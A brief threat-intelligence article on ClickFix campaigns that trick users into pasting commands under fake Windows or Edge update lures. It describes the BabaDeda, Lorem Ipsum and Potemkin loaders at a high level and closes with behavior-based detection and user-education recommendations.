ClickFix Campaigns Expand Malware Delivery With New Loaders and Fake Update Lures

The ClickFix technique has resurfaced as a low‑cost, high‑impact vector, leveraging familiar “press Win+R, paste this” instructions that users readily obey. By masquerading as legitimate Windows or Edge updates, attackers sidestep traditional download filters and exploit the trust users place in system‑generated prompts. The recent disruption of the Fox Tempest signing‑as‑a‑service platform eliminated the convenience of signed installers, prompting threat groups to adopt unsigned, command‑line based delivery that is harder for signature‑based tools to flag.

At the core of these campaigns are three distinct loaders. BabaDeda continues its legacy of stealth by profiling the host, skipping Russian or Belarusian machines, and injecting payloads into trusted processes like svchost.exe. Lorem Ipsum, linked to the Vanilla Tempest actor, hijacks compromised WordPress sites and an outdated Node.js runtime to unpack a ZIP archive that ultimately drops a backdoor and ransomware. Potemkin, uncovered by Huntress, uses a domain‑generation algorithm and a custom byte cipher to hide its C2 traffic, then reflectively loads modules such as EtherRAT and RMMProject, enabling credential theft and lateral movement across networks.

For security teams, the modular nature of these loaders demands a shift from signature reliance to behavior‑based detection. Monitoring for anomalous PowerShell execution, unexpected DLL side‑loading, and unusual DGA‑related DNS queries can surface early indicators of compromise. Endpoint protection should enforce strict application control, block unsigned MSI/HTA execution, and sandbox PowerShell scripts before they run. Finally, user education remains vital: reinforcing that legitimate updates never require manual command entry can blunt the human element that ClickFix exploits, while platform‑level mitigations like Apple’s new macOS Terminal warning add another layer of defense.